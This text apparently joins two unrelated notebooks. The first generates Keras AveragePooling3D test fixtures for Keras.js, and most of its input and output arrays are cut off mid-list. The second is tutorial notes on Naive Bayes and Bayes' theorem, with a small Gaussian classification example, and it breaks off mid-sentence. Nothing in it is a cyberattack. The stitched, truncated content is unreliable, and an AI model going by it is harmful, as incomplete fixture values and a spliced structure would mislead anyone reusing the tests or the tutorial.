0.57064, -0.861888, 0.616985, -0.027436, 0.40181, -0.30391, 0.9226[...]**[pooling.AveragePooling3D.2] input 4x5x2x3, pool_size=(2, 2, 2), strides=(2, 1, 1), padding='valid', data_format='channels_last'**data_in_shape = (4, 5, 2, 3) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(2, 1, 1), padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(282) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.2'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 5, 2, 3) in: [-0.263147, -0.216555, -0.75766, -0.396007, 0.85243, 0.98415, -0.230197, -0.979579, 0.117628, -0.66833, 0.714058, -0.907302, -0.574249, 0.299573, 0.101165, 0.655872, -0.104788, 0.242064, -0.409262, -0.124059, 0.105687, -0.969325, -0.167941, 0.382377, 0.710487, 0.793042, 0.180663, -0.80231, 0.684253, -0.516992, 0.471203, -0.152325, 0.509501, 0.613742, -0.877379, 0.755416, 0.427677, 0.931956, 0.827636, -0.860685, 0.562326, -0.716081, 0.028046, 0.594422, -0.862333, 0.336131, 0.713855, 0.386247, -0.986659, 0.242413, 0.753777, -0.159358, 0.166548, -0.437388, 0.291152, -0.775555, 0.796086, -0.592021, -0.251661, 0.187174, 0.899283, 0.431861, -0.685273, -0.085991, -0.629026, -0.478334, 0.714983, 0.53745, -0.310438, 0.973848, -0.675219, 0.422743, -0.992263, 0.374017, -0.687462, -0.190455, -0.560081, 0.22484, -0.079631, 0.815275, 0.338641, -0.538279, -0.10891, -0.929005, 0.514762, 0.322038, 0.702195, -0.697122, 0.925468, -0.274158, 0.148379, 0.333239, 0.63072, -0.6529[...]**[pooling.AveragePooling3D.3] input 4x4x4x2, pool_size=(3, 3, 3), strides=None, padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=None, padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(283) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.3'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.19483, -0.346754, 0.281648, -0.656271, 0.588328, 0.864284, -0.661556, 0.344578, 0.534692, 0.187914, -0.172976, 0.100575, 0.287857, 0.151936, 0.679748, 0.137527, 0.726773, -0.503042, -0.902524, -0.895315, 0.870645, 0.792427, -0.102238, -0.748643, -0.048728, -0.025835, 0.358631, 0.804295, -0.300104, -0.99179, -0.699454, -0.943476, -0.448011, 0.628611, 0.060595, 0.716813, -0.33607, 0.549002, 0.810379, 0.074881, -0.689823, 0.17513, -0.975426, 0.961779, -0.030624, -0.914643, -0.735591, 0.031988, -0.554272, 0.253033, 0.73405, 0.426412, -0.361457, 0.787875, -0.266747, -0.166595, 0.922155, -0.04597, -0.465312, 0.157074, -0.201136, -0.004584, -0.158067, 0.244864, -0.495687, 0.416834, -0.583545, 0.654634, -0.318258, -0.709804, -0.393463, 0.589381, -0.900991, 0.266171, 0.955916, -0.6571, 0.990855, -0.078764, 0.609356, -0.526011, -0.902476, 0.040574, -0.045497, -0.110604, 0.035908, -0.91532, -0.170028, -0.02148, -0.994139, 0.020418, 0.989168, -0.802385, 0.353583, -0.[...]**[pooling.AveragePooling3D.4] input 4x4x4x2, pool_size=(3, 3, 3), strides=(3, 3, 3), padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(3, 3, 3), padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(284) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.4'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.691755, -0.79282, -0.953135, 0.756956, -0.736874, 0.171061, -0.801845, 0.588236, -0.884749, 0.06721, -0.585121, -0.546211, -0.605281, -0.998989, 0.309413, -0.260604, -0.123585, 0.168908, -0.179496, 0.657412, -0.973664, 0.146258, -0.851615, -0.320588, 0.375102, -0.048494, 0.822789, 0.063572, -0.956466, 0.083595, 0.121146, 0.789353, -0.815498, -0.056454, -0.472042, -0.423572, 0.460752, 0.784129, -0.964421, -0.02912, -0.194265, 0.17147, -0.336383, -0.785223, 0.978845, 0.88826, -0.498649, -0.958507, 0.055052, -0.991654, -0.027882, 0.079693, 0.901998, 0.036266, -0.73015, -0.472116, 0.651073, 0.821196, 0.562183, 0.42342, -0.236111, 0.661076, -0.983951, -0.116893, -0.179815, 0.375962, -0.018703, -0.242038, -0.561415, 0.322072, 0.468695, 0.768235, -0.354887, 0.528139, 0.796988, -0.976979, 0.279858, -0.790546, 0.485339, 0.693701, -0.130412, 0.211269, -0.346429, 0.06497, 0.932512, -0.675758, -0.636085, 0.065187, -0.720225, -0.060809, -0.783716, -0.1708, 0.256143, 0[...]**[pooling.AveragePooling3D.5] input 4x4x4x2, pool_size=(2, 2, 2), strides=None, padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=None, padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(285) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.5'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.495196, -0.886872, 0.220815, 0.126844, 0.168234, -0.640849, 0.457897, -0.375014, 0.001134, -0.486501, -0.819617, -0.468351, 0.15859, 0.39238, -0.590545, -0.402922, 0.821619, -0.208255, -0.512219, -0.586151, -0.365648, -0.195611, -0.280978, -0.08818, -0.449229, 0.169082, 0.075074, -0.719751, 0.657827, -0.060862, -0.217533, 0.907503, 0.902317, 0.613945, 0.670047, -0.808346, 0.060215, -0.446612, -0.710328, -0.018744, 0.348018, -0.294409, 0.623986, -0.216504, 0.270099, -0.216285, -0.433193, -0.197968, -0.829926, -0.93864, -0.901724, -0.388869, -0.658339, -0.931401, -0.654674, -0.469503, 0.970661, 0.008063, -0.751014, 0.519043, 0.197895, 0.959095, 0.875405, 0.700615, 0.301314, -0.980157, 0.275373, -0.082646, 0.100727, -0.027273, -0.322366, 0.26563, 0.668139, 0.890289, 0.854229, -0.85773, -0.07833, -0.319645, -0.948873, 0.403526, 0.683097, 0.174958, 0.926944, -0.418256, -0.406667, -0.333808, 0.102223, -0.00576, 0.182281, 0.979655, 0.230246, 0.422968, -0.381217[...]**[pooling.AveragePooling3D.6] input 4x4x4x2, pool_size=(2, 2, 2), strides=(1, 1, 1), padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(1, 1, 1), padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(286) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.6'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.709952, -0.532913, -0.169956, -0.391538, 0.729034, -0.2004, -0.67324, -0.973672, 0.879975, -0.981827, -0.4828, -0.887985, 0.843364, 0.710745, -0.260613, 0.20082, 0.309563, 0.721671, -0.967848, -0.976471, -0.13058, 0.052684, 0.666494, -0.319759, -0.060338, 0.359151, -0.795562, 0.70488, 0.100816, 0.466479, 0.992415, 0.066527, -0.690663, -0.741365, -0.251801, -0.479328, 0.62187, 0.578729, 0.598481, 0.817115, -0.913801, -0.694569, 0.397726, -0.31274, 0.163147, 0.087004, -0.744957, -0.920201, 0.440377, -0.191648, -0.227724, -0.562736, -0.484598, -0.230876, 0.019055, 0.988723, 0.656988, 0.185623, -0.629304, -0.321252, 0.329452, 0.355461, 0.734458, 0.496983, 0.181439, 0.414232, 0.776873, 0.68191, -0.846744, -0.442164, -0.526272, 0.92696, -0.704629, -0.800248, 0.643923, 0.775996, -0.203863, -0.756864, -0.398058, -0.914275, 0.980404, 0.329099, -0.576086, 0.851052, -0.74133, -0.23673, -0.001628, 0.972916, -0.571033, 0.669151, -0.977945, -0.707472, 0.371069, -0.772[...]**[pooling.AveragePooling3D.7] input 4x5x4x2, pool_size=(2, 2, 2), strides=(1, 2, 1), padding='same', data_format='channels_last'**data_in_shape = (4, 5, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(1, 2, 1), padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(287) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.7'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 5, 4, 2) in: [-0.71103, 0.421506, 0.752321, 0.542455, -0.557162, -0.963774, 0.910303, -0.933284, 0.67521, 0.588709, -0.782848, -0.108964, -0.767069, 0.338318, -0.660374, -0.967294, -0.501079, -0.917532, -0.087991, -0.160473, 0.520493, 0.612007, -0.955448, -0.809749, -0.627003, 0.494441, 0.985405, 0.99813, -0.278165, 0.090068, 0.803872, 0.287682, 0.162199, 0.1796, -0.630223, 0.044743, 0.9092, 0.023879, -0.403203, -0.005329, -0.29237, -0.510033, -0.190427, 0.149011, 0.873547, -0.58793, -0.302525, 0.102122, -0.804112, 0.965834, 0.302039, -0.806929, 0.627682, 0.876256, 0.176245, 0.051969, 0.005712, -0.877694, -0.776877, -0.360984, 0.172577, 0.953108, 0.755911, 0.973515, 0.745292, 0.765506, 0.119956, 0.378346, 0.425789, 0.048668, 0.363691, -0.499862, 0.315721, 0.243267, 0.333434, -0.001645, -0.007235, -0.463152, -0.002048, 0.862117, -0.575785, 0.594789, 0.068012, 0.165267, 0.081581, 0.128645, 0.559305, -0.494595, 0.10207, 0.278472, -0.815856, 0.817863, 0.101417, -0.432774, -0[...]**[pooling.AveragePooling3D.8] input 4x4x4x2, pool_size=(3, 3, 3), strides=None, padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=None, padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(288) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.8'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.106539, 0.430065, 0.625063, -0.956042, 0.681684, 0.345995, -0.589061, 0.186737, 0.535452, -0.125905, -0.396262, -0.44893, 0.39021, 0.253402, -0.238515, 0.337141, 0.178107, 0.244331, -0.93179, -0.081267, 0.895223, 0.820023, 0.365435, -0.738456, 0.893031, -0.787916, -0.518813, 0.661518, -0.464144, -0.639165, -0.252917, 0.784083, 0.577398, 0.769552, 0.036096, 0.847521, -0.171916, 0.07536, -0.830068, 0.734205, -0.437818, 0.295701, 0.252657, -0.859452, -0.425833, -0.650296, -0.584695, 0.163986, 0.43905, -0.521755, 0.620616, 0.066707, -0.101702, 0.941175, 0.479202, 0.624312, -0.372154, 0.625845, 0.980521, -0.834695, -0.40269, 0.784157, 0.814068, -0.485038, -0.150738, 0.682911, 0.406096, -0.405868, -0.337905, 0.803583, -0.764964, 0.96897, -0.057235, 0.403604, -0.605392, 0.389273, 0.235543, -0.095585, -0.860692, 0.937457, -0.928888, 0.702073, -0.18066, 0.033968, -0.082046, -0.237205, 0.922919, 0.064731, -0.026908, -0.865491, 0.881128, 0.265603, -0.132321, -0.7018[...]**[pooling.AveragePooling3D.9] input 4x4x4x2, pool_size=(3, 3, 3), strides=(3, 3, 3), padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(3, 3, 3), padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(289) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.9'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.454263, 0.047178, -0.644362, 0.432654, 0.776147, -0.088086, -0.16527, -0.152361, -0.723283, 0.119471, -0.020663, 0.230897, 0.249349, -0.825224, 0.809245, 0.37136, 0.649976, 0.690981, -0.5766, 0.750394, -0.777363, -0.359006, 0.398419, -0.851015, -0.479232, -0.924962, -0.898893, 0.135445, 0.819369, -0.867218, 0.039715, 0.304805, -0.865872, -0.891635, 0.730554, 0.178083, 0.981329, 0.047786, -0.466968, -0.89441, -0.037018, -0.880158, 0.635061, 0.108217, 0.405675, 0.242025, 0.524396, -0.46013, -0.98454, 0.227442, -0.159924, -0.396205, -0.843265, 0.181395, -0.743803, 0.445469, 0.05215, 0.837067, -0.756402, -0.959109, -0.580594, -0.677936, -0.929683, -0.165592, -0.870784, 0.91887, 0.542361, 0.46359, -0.521332, 0.778263, 0.662447, 0.692057, 0.224535, -0.087731, 0.904644, 0.207457, -0.564079, -0.389642, 0.590403, -0.861828, -0.280471, -0.593786, -0.542645, 0.788946, -0.808773, -0.334536, -0.973711, 0.68675, 0.383992, -0.38838, 0.278601, -0.89188, -0.582918, -0.190[...]**[pooling.AveragePooling3D.10] input 2x3x3x4, pool_size=(3, 3, 3), strides=(2, 2, 2), padding='valid', data_format='channels_first'**data_in_shape = (2, 3, 3, 4) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(2, 2, 2), padding='valid', data_format='channels_first') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(290) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.10'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (2, 3, 3, 4) in: [-0.453175, -0.475078, 0.486234, -0.949643, -0.349099, -0.837108, 0.933439, 0.167853, -0.995191, 0.459466, -0.788337, -0.120985, 0.06215, 0.138625, -0.102201, 0.976605, -0.591051, -0.592066, 0.469334, -0.435067, 0.621416, 0.817698, 0.790015, 0.485862, 0.469679, -0.611443, 0.582845, -0.503885, -0.379174, -0.451035, 0.052289, 0.131836, -0.609312, -0.828722, -0.422428, -0.648754, -0.339801, -0.758017, 0.754244, -0.544823, 0.691656, 0.076848, -0.32539, 0.306448, -0.662415, 0.334329, 0.030666, -0.414111, -0.757096, -0.20427, -0.893088, -0.681919, -0.619269, -0.640749, 0.867436, 0.971453, -0.42039, -0.574905, -0.34642, 0.588678, -0.247265, 0.436084, 0.220126, 0.114202, 0.613623, 0.401452, -0.270262, -0.591146, -0.872383, 0.818368, 0.336808, 0.338197] out shape: (2, 1, 1, 1) out: [-0.096379, -0.08704]**[pooling.AveragePooling3D.11] input 2x3x3x4, pool_size=(3, 3, 3), strides=(1, 1, 1), padding='same', data_format='channels_first'**data_in_shape = (2, 3, 3, 4) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(1, 1, 1), padding='same', data_format='channels_first') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(291) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.11'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (2, 3, 3, 4) in: [-0.803361, 0.348731, 0.30124, -0.168638, 0.516406, -0.258765, 0.297839, 0.993235, 0.958465, -0.273175, -0.704992, 0.261477, -0.301255, 0.263104, 0.678631, -0.644936, -0.029034, -0.320266, 0.307733, -0.479016, 0.608177, 0.034951, 0.456908, -0.929353, 0.594982, -0.243058, -0.524918, 0.455339, 0.034216, 0.356824, 0.63906, -0.259773, -0.084724, 0.248472, -0.608134, 0.0077, 0.400591, -0.960703, -0.247926, -0.774509, 0.496174, -0.319044, -0.324046, -0.616632, -0.322142, -0.472846, 0.171825, -0.030013, 0.992861, -0.645264, 0.524886, 0.673229, 0.883122, 0.25346, -0.706988, -0.654436, 0.918349, -0.139113, 0.742737, 0.338472, -0.812719, 0.860081, 0.003489, 0.667897, 0.362284, -0.283972, 0.995162, 0.67962, -0.700244, -0.137142, 0.045695, -0.450433] out shape: (2, 3, 3, 4) out: [-0.073055, 0.083417, 0.109908, 0.160761, 0.061998, 0.11563, 0.00915, 0.030844, 0.154595, 0.132854, -0.051119, 0.025479, 0.01321, 0.103228, 0.096798, 0.132983, 0.091705, 0.092372, 0.008749, 0.00[...]**[pooling.AveragePooling3D.12] input 3x4x4x3, pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_first'**data_in_shape = (3, 4, 4, 3) L = AveragePooling3D(pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_first') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(292) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.12'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (3, 4, 4, 3) in: [-0.497409, -0.250345, 0.196124, -0.044334, -0.324906, 0.560065, 0.220435, -0.167776, -0.923771, 0.77337, -0.862909, -0.584756, -0.70451, 0.870272, 0.841773, -0.312016, 0.599915, 0.073955, 0.944336, -0.4175, 0.865698, 0.609184, 0.033839, -0.72494, -0.239473, 0.514968, -0.318523, -0.244443, 0.275468, -0.85993, -0.262732, 0.026767, -0.937574, 0.872647, 0.540013, 0.055422, 0.322167, 0.972206, 0.92596, -0.82368, -0.63508, 0.671616, -0.678809, 0.202761, -0.260164, -0.241878, 0.188534, -0.47291, -0.077436, -0.016304, 0.548747, -0.236224, -0.780147, -0.013071, -0.67362, -0.807763, -0.351361, 0.533701, 0.274553, -0.933379, -0.49029, 0.928012, -0.719924, 0.453519, 0.173223, 0.030778, 0.12229, 0.547074, -0.860491, 0.206434, 0.248515, -0.189106, -0.393127, -0.152128, -0.822508, -0.361768, -0.702917, 0.998304, -0.011396, -0.644766, -0.150506, -0.153633, -0.772981, -0.470261, -0.056372, 0.082635, 0.017418, 0.26302, 0.730468, 0.268813, -0.163174, 0.332229, -0.698119, -0.3[...]export for Keras.js testsprint(json.dumps(DATA)){"pooling.AveragePooling3D.0": {"input": {"data": [-0.453175, -0.475078, 0.486234, -0.949643, -0.349099, -0.837108, 0.933439, 0.167853, -0.995191, 0.459466, -0.788337, -0.120985, 0.06215, 0.138625, -0.102201, 0.976605, -0.591051, -0.592066, 0.469334, -0.435067, 0.621416, 0.817698, 0.790015, 0.485862, 0.469679, -0.611443, 0.582845, -0.503885, -0.379174, -0.451035, 0.052289, 0.131836, -0.609312, -0.828722, -0.422428, -0.648754, -0.339801, -0.758017, 0.754244, -0.544823, 0.691656, 0.076848, -0.32539, 0.306448, -0.662415, 0.334329, 0.030666, -0.414111, -0.757096, -0.20427, -0.893088, -0.681919, -0.619269, -0.640749, 0.867436, 0.971453, -0.42039, -0.574905, -0.34642, 0.588678, -0.247265, 0.436084, 0.220126, 0.114202, 0.613623, 0.401452, -0.270262, -0.591146, -0.872383, 0.818368, 0.336808, 0.338197, -0.275646, 0.375308, -0.928722, -0.836727, -0.504007, -0.503397, -0.636099, 0.948482, -0.639661, -0.026878, -0.122643, -0.634018, -0.247016, 0.517246, -0.398639, 0.752174, -0.014633, -0.170534, -[...]Naive BayesWe have vectorised our lyrics corpus using Bag of Words. How can we run predictions on that? - Using Naive Bayes!Naive Bayes are their own family of Machine Learning modelling - Bayes means it belongs to a group that gives you probability scores!They are very useful and have lots of functions: we can introduce thresholds to say only show us results only where you are really sure!- Based on Bayes' Theorem - it **describes the probability of an event, based on prior knowledge of conditions that might be related to the event.** For example, if cancer is related to age, then, using Bayes' theorem, a person's age can be used to more accurately assess the probability that they have cancer, compared to the assessment of the probability of cancer made without knowledge of the person's age. What is a prior?- A prior is the assumed probability of an event before taking any data into account.For instance, if we look at the word “yeah” in documents, we would expect it to occur with the average frequency over all documents, before looking at an individual document. The probability associated with the average frequency is the prior of “yeah”.Naive Bayes - what we want to calculate: p(doc|A) x p(A) <---- Prior - this is the probability -> p (A|doc) = _____________________ | p(B) <---- Marginal probability - has a nice property: | We can ignore it! We're not interested in | absolute probability, we just want to know Posterior Probability probability of Eminem v Madonna \begin{align}P(doc|A) = P({W_1}|A) . P({W_2}|A) ...\end{align} Naive Bayes Probabilistic ModelIn plain English, using Bayesian probability terminology, the above equation can be written as\begin{align}Posterior = \frac{prior * likelihood}{evidence}\end{align} **The posterior probability is the probability after looking at the data.** Bayes' theorem is stated mathematically as the following equation:\begin{align}\displaystyle P(A\mid B)={\frac {P(B\mid A)\,P(A)}{P(B)}}\end{align} where A and B are events and P(B) not equal to 0- P(A|B) is a conditional probability: the likelihood of event A occurring given that B is true.- P(B|A) is also a conditional probability: the likelihood of event B occurring given that A is true.- P(A) and P(B) are the probabilities of observing A and B independently of each other; this is known as the marginal probability.This might be too abstract, so let us replace some of the variables to make it more concrete. In a bayes classifier, we are interested in finding out the class (e.g. male or female, spam or ham) of an observation given the data:\begin{align}P(class|data) = \frac {P(data|class)∗P(class)}{P(data)}\end{align} Here, **P(class) is the prior**. **P(data) is called the marginal probability**. In a classifier, we **can usually ignore the latter**, because we **only need to know the ratio between the classes.**- class is a particular class (e.g. male)- data is an observation’s data- p(class | data) is called the posterior- p(data | class) is called the likelihood- p(class) is called the prior- p(data) is called the marginal probability The Bayes ErrorIf we knew the underlying distribution of the data, we could build a perfect Bayesian model. Even then, there would be a residual error due to noise in the data. We call this the **Bayes Error**. Advantages:- fast- accurate- probability scores given- works well even under small data- often very intuitive Disadvantages:- Overfitting - you'll often have to optimise the hyperparameter alpha and this can be quite difficult - Can try and optimise that using GridSearch or TPOT(mentioned there's an issue here for Naive Bayes)- Computationally costly in large data- A prior must be chosen Naive Bayes Classifier From Scratch - Copyright © , 2020 Create DataOur dataset is contains data on eight individuals. We will use the dataset to construct a classifier that takes in the height, weight, and foot size of an individual and outputs a prediction for their gender.import pandas as pd import numpy as np # Create an empty dataframe data = pd.DataFrame() # Create our target variable data['Gender'] = ['male','male','male','male','female','female','female','female'] # Create our feature variables data['Height'] = [6,5.92,5.58,5.92,5,5.5,5.42,5.75] data['Weight'] = [180,190,170,165,100,150,130,150] data['Foot_Size'] = [12,11,12,10,6,8,7,9] # View the data dataThe dataset above is used to construct our classifier. Below we will create a new person for whom we know their feature values but not their gender. Our goal is to predict their gender.# Create an empty dataframe person = pd.DataFrame() # Create some feature values for this single row person['Height'] = [6] person['Weight'] = [130] person['Foot_Size'] = [8] # View the data personIn a bayes classifier, we calculate the posterior (technically we only calculate the numerator of the posterior, but ignore that for now) for every class for each observation. Then, classify the observation based on the class with the largest posterior value. In our example, we have one observation to predict and two possible classes (e.g. male and female), therefore we will calculate two posteriors: one for male and one for female.\begin{align}p(\text{person is male} \mid \mathbf {\text{person’s data}} )={\frac {p(\mathbf {\text{person’s data}} \mid \text{person is male}) * p(\text{person is male})}{p(\mathbf {\text{person’s data}} )}}\end{align}\begin{align}p(\text{person is female} \mid \mathbf {\text{person’s data}} )={\frac {p(\mathbf {\text{person’s data}} \mid \text{person is female}) * p(\text{person is female})}{p(\mathbf {\text{person’s data}} )}}\end{align} Gaussian Naive Bayes ClassifierA gaussian naive bayes is probably the most popular type of bayes classifier. To explain what the name means, let us look at what the bayes equations looks like when we apply our two classes (male and female) and three feature variables (height, weight, and footsize):\begin{align}{\displaystyle {\text{posterior (male)}}={\frac {P({\text{male}})\,p({\text{height}}\mid{\text{male}})\,p({\text{weight}}\mid{\text{male}})\,p({\text{foot size}}\mid{\text{male}})}{\text{marginal probability}}}}\end{align}\begin{align}{\displaystyle {\text{posterior (female)}}={\frac {P({\text{female}})\,p({\text{height}}\mid{\text{female}})\,p({\text{weight}}\mid{\text{female}})\,p({\text{foot size}}\mid{\text{female}})}{\text{marginal probability}}}}\end{align} Now let us unpack the top equation a bit:- P(male) is the prior probabilities. It is, as you can see, simply the probability an observation is male. This is just the number of males in the dataset divided by the total number of people in the dataset.- p(height∣female)p(weight∣female)p(foot size∣female) is the likelihood. Notice that we have unpacked `person’s data` so it is now every feature in the dataset. The “gaussian” and “naive” come from two assumptions present in this likelihood: 1. If you look each term in the likelihood you will notice that we assume each feature is uncorrelated from each other. That is, foot size is independent of weight or height etc.. This is obviously not true, and is a “naive” assumption - hence the name “naive bayes.” 2. Second, we assume have that the value of the features (e.g. the height of women, the weight of women) are normally (gaussian) distributed. This means that p(height∣female) is calculated by inputing the required parameters into the probability density function of the normal distribution: \begin{align}p(\text{height}\mid\text{female})=\frac{1}{\sqrt{2\pi\text{variance of female height in the data}}}\,e^{ -\frac{(\text{observation’s height}-\text{average height of females in the data})^2}{2\text{variance of female height in the data}} }\end{align}- **marginal probability** - is probably one of the most confusing parts of bayesian approaches. In toy examples (including ours) it is completely possible to calculate the marginal probability. However, in many real-world cases, it is either extremely difficult or impossible to find the value of the marginal probability (explaining why is beyond the scope of this tutorial). This is not as much of a problem for our classifier as you might think. Why? Because we don’t care what the true posterior value is, we only care which class has a the highest posterior value. And because the marginal probability is the same for all classes 1) we can ignore the denominator, 2) calculate only the posterior’s numerator for each class, and 3) pick the largest numerator. That is, we can ignore the 